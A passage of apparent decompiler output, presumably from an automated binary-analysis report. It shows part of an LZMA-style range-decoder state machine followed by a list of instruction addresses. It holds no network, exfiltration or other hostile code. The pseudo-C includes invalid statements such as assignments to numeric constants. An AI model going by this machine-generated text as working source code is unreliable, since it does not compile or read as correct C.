                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edx;
                                                                                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L39;
                                                                                                                          											} else {
                                                                                                                          												goto L37;
                                                                                                                          											}
                                                                                                                          										case 0xe:
                                                                                                                          											L46:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xe;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t156 = __ebp - 0x70;
                                                                                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t156;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											while(1) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __ebx - 0x100;
                                                                                                                          												if(__ebx >= 0x100) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												__edx = __ebx + __ebx;
                                                                                                                          												__ecx =  *(__ebp - 0x10);
                                                                                                                          												__esi = __edx + __eax;
                                                                                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          												__ax =  *__esi;
                                                                                                                          												 *(__ebp - 0x54) = __esi;
                                                                                                                          												__edi = __ax & 0x0000ffff;
                                                                                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          													__cx = __ax;
                                                                                                                          													_t170 = __edx + 1; // 0x1
                                                                                                                          													__ebx = _t170;
                                                                                                                          													__cx = __ax >> 5;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													 *__esi = __ax;
                                                                                                                          												} else {
                                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                                          													0x800 = 0x800 - __edi;
                                                                                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          													__ebx = __ebx + __ebx;
                                                                                                                          													 *__esi = __cx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													goto L46;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L54:
                                                                                                                          											_t173 = __ebp - 0x34;
                                                                                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          											__eflags =  *_t173;
                                                                                                                          											goto L55;
                                                                                                                          										case 0xf:
                                                                                                                          											L58:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0xf;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t203 = __ebp - 0x70;
                                                                                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t203;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L60:
                                                                                                                          											__eflags = __ebx - 0x100;
                                                                                                                          											if(__ebx >= 0x100) {
                                                                                                                          												L55:
                                                                                                                          												__al =  *(__ebp - 0x44);
                                                                                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          												goto L56;
                                                                                                                          											}
                                                                                                                          											L61:
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__edx = __ebx + __ebx;
                                                                                                                          											__ecx =  *(__ebp - 0x10);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												_t217 = __edx + 1; // 0x1
                                                                                                                          												__ebx = _t217;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eflags = __eax;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											 *(__ebp - 0x44) = __ebx;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L60;
                                                                                                                          											} else {
                                                                                                                          												goto L58;
                                                                                                                          											}
                                                                                                                          										case 0x10:
                                                                                                                          											L109:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x10;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t365 = __ebp - 0x70;
                                                                                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t365;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											goto L111;
                                                                                                                          										case 0x11:
                                                                                                                          											L69:
                                                                                                                          											__esi =  *(__ebp - 0x58);
                                                                                                                          											 *(__ebp - 0x84) = 0x12;
                                                                                                                          											while(1) {
                                                                                                                          												 *(_t613 - 0x54) = _t606;
                                                                                                                          												goto L133;
                                                                                                                          											}
                                                                                                                          										case 0x12:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												 *(__ebp - 0x84) = 0x13;
                                                                                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x54) = _t606;
                                                                                                                          													goto L133;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          											goto L130;
                                                                                                                          										case 0x13:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												_t469 = __ebp - 0x58;
                                                                                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          												__eflags =  *_t469;
                                                                                                                          												 *(__ebp - 0x30) = 0x10;
                                                                                                                          												 *(__ebp - 0x40) = 8;
                                                                                                                          												L144:
                                                                                                                          												 *(__ebp - 0x7c) = 0x14;
                                                                                                                          												goto L145;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											 *(__ebp - 0x30) = 8;
                                                                                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          											L130:
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											 *(__ebp - 0x40) = 3;
                                                                                                                          											goto L144;
                                                                                                                          										case 0x14:
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          											__eax =  *(__ebp - 0x80);
                                                                                                                          											 *(_t613 - 0x88) = _t533;
                                                                                                                          											goto L1;
                                                                                                                          										case 0x15:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          											__al = __al & 0x000000fd;
                                                                                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											goto L120;
                                                                                                                          										case 0x16:
                                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                                          											__eflags = __eax - 4;
                                                                                                                          											if(__eax >= 4) {
                                                                                                                          												_push(3);
                                                                                                                          												_pop(__eax);
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                                          											 *(__ebp - 0x40) = 6;
                                                                                                                          											__eax = __eax << 7;
                                                                                                                          											 *(__ebp - 0x7c) = 0x19;
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											goto L145;
                                                                                                                          										case 0x17:
                                                                                                                          											L145:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											 *(__ebp - 0x50) = 1;
                                                                                                                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          											goto L149;
                                                                                                                          										case 0x18:
                                                                                                                          											L146:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x18;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t484 = __ebp - 0x70;
                                                                                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t484;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											L148:
                                                                                                                          											_t487 = __ebp - 0x48;
                                                                                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          											__eflags =  *_t487;
                                                                                                                          											L149:
                                                                                                                          											__eflags =  *(__ebp - 0x48);
                                                                                                                          											if( *(__ebp - 0x48) <= 0) {
                                                                                                                          												__ecx =  *(__ebp - 0x40);
                                                                                                                          												__ebx =  *(__ebp - 0x50);
                                                                                                                          												0 = 1;
                                                                                                                          												__eax = 1 << __cl;
                                                                                                                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          												__eax =  *(__ebp - 0x7c);
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												while(1) {
                                                                                                                          													 *(_t613 - 0x88) = _t533;
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x50);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          											__eax =  *(__ebp - 0x58);
                                                                                                                          											__esi = __edx + __eax;
                                                                                                                          											 *(__ebp - 0x54) = __esi;
                                                                                                                          											__ax =  *__esi;
                                                                                                                          											__edi = __ax & 0x0000ffff;
                                                                                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          												__cx = __ax;
                                                                                                                          												__cx = __ax >> 5;
                                                                                                                          												__eax = __eax - __ecx;
                                                                                                                          												__edx = __edx + 1;
                                                                                                                          												__eflags = __edx;
                                                                                                                          												 *__esi = __ax;
                                                                                                                          												 *(__ebp - 0x50) = __edx;
                                                                                                                          											} else {
                                                                                                                          												 *(__ebp - 0x10) = __ecx;
                                                                                                                          												0x800 = 0x800 - __edi;
                                                                                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          												 *__esi = __cx;
                                                                                                                          											}
                                                                                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          												goto L148;
                                                                                                                          											} else {
                                                                                                                          												goto L146;
                                                                                                                          											}
                                                                                                                          										case 0x19:
                                                                                                                          											__eflags = __ebx - 4;
                                                                                                                          											if(__ebx < 4) {
                                                                                                                          												 *(__ebp - 0x2c) = __ebx;
                                                                                                                          												L119:
                                                                                                                          												_t393 = __ebp - 0x2c;
                                                                                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          												__eflags =  *_t393;
                                                                                                                          												L120:
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												_t400 = __ebp - 0x60;
                                                                                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          												__eflags =  *_t400;
                                                                                                                          												goto L123;
                                                                                                                          											}
                                                                                                                          											__ecx = __ebx;
                                                                                                                          											__eax = __ebx;
                                                                                                                          											__ecx = __ebx >> 1;
                                                                                                                          											__eax = __ebx & 0x00000001;
                                                                                                                          											__ecx = (__ebx >> 1) - 1;
                                                                                                                          											__al = __al | 0x00000002;
                                                                                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          											__eflags = __ebx - 0xe;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__ebx >= 0xe) {
                                                                                                                          												__ebx = 0;
                                                                                                                          												 *(__ebp - 0x48) = __ecx;
                                                                                                                          												L102:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													__eax = __eax + __ebx;
                                                                                                                          													 *(__ebp - 0x40) = 4;
                                                                                                                          													 *(__ebp - 0x2c) = __eax;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													L108:
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													 *(__ebp - 0x50) = 1;
                                                                                                                          													 *(__ebp - 0x44) = 0;
                                                                                                                          													 *(__ebp - 0x48) = 0;
                                                                                                                          													L112:
                                                                                                                          													__eax =  *(__ebp - 0x40);
                                                                                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          														_t391 = __ebp - 0x2c;
                                                                                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          														__eflags =  *_t391;
                                                                                                                          														goto L119;
                                                                                                                          													}
                                                                                                                          													__eax =  *(__ebp - 0x50);
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__esi = __edi + __eax;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													__ecx = __ax & 0x0000ffff;
                                                                                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          														__ecx = 0;
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          														__ecx = 1;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          														__ebx = 1;
                                                                                                                          														__ecx =  *(__ebp - 0x48);
                                                                                                                          														__ebx = 1 << __cl;
                                                                                                                          														__ecx = 1 << __cl;
                                                                                                                          														__ebx =  *(__ebp - 0x44);
                                                                                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eax = __eax - __ecx;
                                                                                                                          														__edi = __edi + 1;
                                                                                                                          														__eflags = __edi;
                                                                                                                          														 *(__ebp - 0x44) = __ebx;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          														 *(__ebp - 0x50) = __edi;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __edx;
                                                                                                                          														0x800 = 0x800 - __ecx;
                                                                                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          														 *__esi = __dx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														L111:
                                                                                                                          														_t368 = __ebp - 0x48;
                                                                                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          														__eflags =  *_t368;
                                                                                                                          														goto L112;
                                                                                                                          													} else {
                                                                                                                          														goto L109;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__ecx =  *(__ebp - 0xc);
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          													__ebx = __ebx | 0x00000001;
                                                                                                                          													__eflags = __ebx;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													L101:
                                                                                                                          													_t338 = __ebp - 0x48;
                                                                                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          													__eflags =  *_t338;
                                                                                                                          													goto L102;
                                                                                                                          												} else {
                                                                                                                          													goto L99;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 4);
                                                                                                                          											__eax = __eax - __ebx;
                                                                                                                          											 *(__ebp - 0x40) = __ecx;
                                                                                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          											goto L108;
                                                                                                                          										case 0x1a:
                                                                                                                          											L56:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x1a;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__ecx =  *(__ebp - 0x68);
                                                                                                                          											__al =  *(__ebp - 0x5c);
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          											 *( *(__ebp - 0x68)) = __al;
                                                                                                                          											__ecx =  *(__ebp - 0x14);
                                                                                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          											__eax = __ecx + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t192;
                                                                                                                          											goto L79;
                                                                                                                          										case 0x1b:
                                                                                                                          											L75:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												 *(__ebp - 0x88) = 0x1b;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          												__eflags = __eax;
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											__cl =  *(__eax + __edx);
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											 *(__ebp - 0x5c) = __cl;
                                                                                                                          											 *(__eax + __edx) = __cl;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t274;
                                                                                                                          											__eax =  *(__ebp - 0x68);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											_t283 = __ebp - 0x64;
                                                                                                                          											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                          											__eflags =  *_t283;
                                                                                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          											L79:
                                                                                                                          											 *(__ebp - 0x14) = __edx;
                                                                                                                          											goto L80;
                                                                                                                          										case 0x1c:
                                                                                                                          											while(1) {
                                                                                                                          												L123:
                                                                                                                          												__eflags =  *(__ebp - 0x64);
                                                                                                                          												if( *(__ebp - 0x64) == 0) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                                          												__cl =  *(__eax + __edx);
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												 *(__ebp - 0x5c) = __cl;
                                                                                                                          												 *(__eax + __edx) = __cl;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__edx = 0;
                                                                                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          												__edx = _t414;
                                                                                                                          												__eax =  *(__ebp - 0x68);
                                                                                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          												__eflags =  *(__ebp - 0x30);
                                                                                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          												 *(__ebp - 0x14) = _t414;
                                                                                                                          												if( *(__ebp - 0x30) > 0) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													L80:
                                                                                                                          													 *(__ebp - 0x88) = 2;
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											 *(__ebp - 0x88) = 0x1c;
                                                                                                                          											goto L170;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L171:
                                                                                                                          								_t535 = _t534 | 0xffffffff;
                                                                                                                          								goto L172;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406373
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x00000000
                                                                                                                          0x00406614
                                                                                                                          0x00406614
                                                                                                                          0x0040636b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x004063a6
                                                                                                                          0x004063a6
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063af
